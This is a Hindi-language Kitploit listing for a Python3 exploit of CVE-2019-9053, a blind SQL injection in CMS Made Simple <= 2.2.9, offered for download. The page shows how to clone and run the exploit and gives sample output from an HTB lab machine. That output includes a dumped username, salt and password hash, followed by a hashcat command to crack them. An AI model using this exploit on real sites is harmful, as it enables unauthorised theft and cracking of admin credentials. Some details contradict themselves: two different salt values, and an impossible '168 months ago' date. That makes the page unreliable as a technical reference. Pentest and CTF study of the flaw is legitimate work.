Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cmsms-sqli — Python3 एक्स्प्लॉइट CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi) के लिए। कोई डिपेंडेंसी नहीं, टाइम-बेस्ड ब्लाइंड SQLi → एडमिन क्रेडेंशियल्स डंप। HTB राइटअप ओन्ड। | Kitploit
उपकरण/GitHubGitHub/tim-karov/cmsms-sqli
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंग
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Python3 एक्स्प्लॉइट CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi) के लिए। कोई डिपेंडेंसी नहीं, टाइम-बेस्ड ब्लाइंड SQLi → एडमिन क्रेडेंशियल्स डंप। HTB राइटअप ओन्ड।

रिपॉजिटरी देखें
168 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CMS Made Simple <= 2.2.9 SQL इंजेक्शन (CVE-2019-9053) - Python3 एक्सप्लॉइट

मूल Exploit-DB #46635 (Daniele Scanu द्वारा) का शुद्ध Python3 पोर्ट। समय-आधारित ब्लाइंड SQLi के माध्यम से कमजोर CMS Made Simple इंस्टॉलेशन से एडमिन क्रेडेंशियल्स डंप करना।

🎯 विशेषताएं:

✅ कोई बाहरी निर्भरता नहीं (केवल requests)
✅ Python 3.6+ मूल (f-strings, walrus operator)
✅ सुंदर रंगीन आउटपुट (ANSI)
✅ स्थिर और तेज़ (~3-5 मिनट डंप औसत कनेक्शन पर)
✅ प्रोडक्शन लक्ष्यों के लिए टाइमआउट/एरर हैंडलिंग
✅ हैशकैट-तैयार आउटपुट (salt + MD5 फॉर्मेट)

🚀 उपयोग:

# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 अनुकूलन:

TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 श्रेय:

मूल लेखक: Daniele Scanu

Exploit-DB: #46635

Python3 पोर्ट और सुधार: Tim Karov

📄 लाइसेंस:

MIT लाइसेंस - LICENSE देखें


⭐ उपयोगी लगे तो स्टार करें! HTB/TryHackMe लैब्स और वास्तविक पेनटेस्ट में उपयोग किया गया।

टूल डाउनलोड करें